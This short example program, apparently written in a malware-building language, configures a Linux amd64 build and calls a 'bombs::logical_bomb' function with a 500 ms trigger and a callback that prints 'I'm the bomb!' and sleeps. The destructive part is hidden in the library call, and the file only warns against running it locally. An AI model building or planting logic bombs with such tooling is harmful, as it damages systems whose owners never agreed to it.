@ Executes a logical bomb @

use system
use bombs
use time

[
    version 3.0
    output logical_bomb
    os linux
    arch amd64
    obfuscate false
    debugger_behavior stop
]

call executioner -> boolean { @ When this function returns, the bomb is executed @
    system::outln("I'm the bomb!")
    time::sleep("600") @ Sleep for 10 minutes before returning @
}

loop main_func {
    system::outln("Warning: Do not try this on your own machine!")
    bombs::logical_bomb(${"500", "executioner"}$) @ 500 ms until it blows up @
    system::exit("0")
}